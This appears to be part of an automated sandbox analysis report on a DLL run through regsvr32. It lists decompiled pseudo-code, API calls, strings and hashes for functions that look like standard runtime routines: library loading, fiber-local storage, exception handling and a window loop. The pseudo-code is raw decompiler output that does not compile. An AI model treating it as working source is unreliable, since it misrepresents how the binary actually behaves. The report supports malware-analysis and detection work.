libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0xc11a2227b184
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0xc11a2227b184
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

0x18000a3dc
0x18000a3e1
0x18000a3e6
0x18000a3f8
0x18000a402
0x18000a418
0x18000a41f
0x18000a428
0x18000a42e
0x18000a437
0x18000a439
0x18000a43c
0x18000a444
0x18000a44d
0x18000a459
0x18000a45e
0x18000a464
0x18000a476
0x18000a47c
0x18000a488
0x18000a497
0x18000a499
0x18000a499
0x18000a49f
0x18000a4b0
0x18000a4b2
0x18000a4c6
0x18000a4c8
0x18000a4d0
0x18000a4dc
0x18000a4e8
0x18000a4f7
0x18000a4fd
0x18000a511
0x18000a517
0x18000a53d

APIs

FreeLibrary.KERNEL32 ref: 000000018000A558
GetProcAddress.KERNEL32 ref: 000000018000A564

Strings

ext-ms-, xrefs: 000000018000A4B5
api-ms-, xrefs: 000000018000A4A2

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}

0x1800045bc
0x1800045c1
0x1800045c6
0x1800045e1
0x1800045ee
0x1800045fa
0x180004603
0x18000460c
0x180004615
0x180004621
0x180004626
0x18000462c
0x18000463b
0x180004641
0x180004647
0x18000464d
0x180004658
0x18000465a
0x18000465a
0x18000466f
0x180004671
0x180004679
0x180004685
0x180004691
0x1800046a0
0x1800046af
0x1800046af
0x1800046af
0x1800046ba
0x1800046bf
0x1800046cb
0x1800046d4
0x1800046d9
0x1800046e1
0x1800046e3
0x180004709

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB

Strings

api-ms-, xrefs: 0000000180004661

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180007DC7
FlsGetValue.KERNEL32 ref: 0000000180007DDC
FlsSetValue.KERNEL32 ref: 0000000180007DFD
FlsSetValue.KERNEL32 ref: 0000000180007E2A
FlsSetValue.KERNEL32 ref: 0000000180007E3B
FlsSetValue.KERNEL32 ref: 0000000180007E4C
SetLastError.KERNEL32 ref: 0000000180007E67

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000000018000F3A5
GetLastError.KERNEL32 ref: 000000018000F3B1
CloseHandle.KERNEL32 ref: 000000018000F3C9
CreateFileW.KERNEL32 ref: 000000018000F3F4
WriteConsoleW.KERNEL32 ref: 000000018000F413

Strings

CONOUT$, xrefs: 000000018000F3D5

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
FlsSetValue.KERNEL32(?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
FlsSetValue.KERNEL32(?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
FlsSetValue.KERNEL32(?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
FlsSetValue.KERNEL32(?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
SetLastError.KERNEL32(?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 0000000180014CBF
LoadStringW.USER32 ref: 0000000180014CDC

Part of subcall function 00000001800109D0: LoadCursorW.USER32 ref: 0000000180010A22
Part of subcall function 00000001800109D0: RegisterClassExW.USER32 ref: 0000000180010A59

Part of subcall function 0000000180010910: CreateWindowExW.USER32 ref: 000000018001098A

GetMessageW.USER32 ref: 0000000180014D0F
TranslateAcceleratorW.USER32 ref: 0000000180014D25
TranslateMessage.USER32 ref: 0000000180014D34
DispatchMessageW.USER32 ref: 0000000180014D3F

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
String ID:
API String ID: 1967609040-0
Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}

0x180003b5c
0x180003b5f
0x180003b63
0x180003b67
0x180003b6b
0x180003b75
0x180003b78
0x180003b7e
0x180003b81
0x180003b84
0x180003b89
0x180003b8e
0x180003ba4
0x180003bac
0x180003bb0
0x180003bb6
0x180003bc0
0x180003bc4
0x180003bd2
0x180003bd8
0x180003be2
0x180003bec
0x180003bfa
0x180003c04
0x180003c08
0x180003c14
0x180003c1c
0x180003c25
0x180003c2b
0x180003c37
0x180003c3c
0x180003c43
0x180003c45
0x180003c4d
0x180003c57
0x180003c61
0x180003c6c
0x180003c71
0x180003c7a
0x180003c88
0x180003c8a
0x180003c8e
0x180003c90
0x180003c9c
0x180003caa
0x180003cb8
0x180003cc4
0x180003cca
0x180003cd3
0x180003cd5
0x180003cdd
0x180003cdf
0x180003cf2
0x180003d09
0x180003d18
0x180003d20
0x180003d27
0x180003d2c
0x180003d32
0x180003d3f
0x180003d51
0x180003d5f
0x180003d63
0x180003d68
0x180003d8c

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180003B84
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000000180003C6C
__std_exception_copy.LIBVCRUNTIME ref: 0000000180003DB8

Strings

csm, xrefs: 0000000180003CBE
csm, xrefs: 0000000180003BA6

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
String ID: csm$csm
API String ID: 851805269-3733052814
Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}

0x180002a84
0x180002a84
0x180002a89
0x180002a8e
0x180002a9c
0x180002aa0
0x180002aa3
0x180002aac
0x180002aaf
0x180002ab4
0x180002abb
0x180002abf
0x180002ac6
0x180002aca
0x180002ad0
0x180002ad5
0x180002adc
0x180002ae4
0x180002aee
0x180002afb
0x180002b06
0x180002b11
0x180002b24
0x180002b26
0x180002b28
0x180002b31
0x180002b3b
0x180002b4b
0x180002b55
0x180002b5f
0x180002b6b
0x180002b77
0x180002b7e
0x180002b85
0x180002b8a
0x180002b8e
0x180002b93
0x180002b99
0x180002ba0
0x180002ba7
0x180002bb0
0x180002bb3
0x180002bba
0x180002bc4
0x180002bce
0x180002bd1
0x180002bd3
0x180002bd7
0x180002bdb
0x180002bdd
0x180002be2
0x180002be4
0x180002be7
0x180002bf2
0x180002bfc
0x180002c07
0x180002c12
0x180002c14
0x180002c1a
0x180002c1f
0x180002c27
0x180002c2c
0x180002c31
0x180002c33
0x180002c3b
0x180002c3f
0x180002c49
0x180002c52
0x180002c7a

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180002AAF
_IsNonwritableInCurrentImage.LIBCMT ref: 0000000180002B44
RtlUnwindEx.KERNEL32 ref: 0000000180002B93

Strings

csm, xrefs: 0000000180002B2A
f, xrefs: 0000000180002AC2

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700

Uniqueness

Uniqueness Score: -1.00%

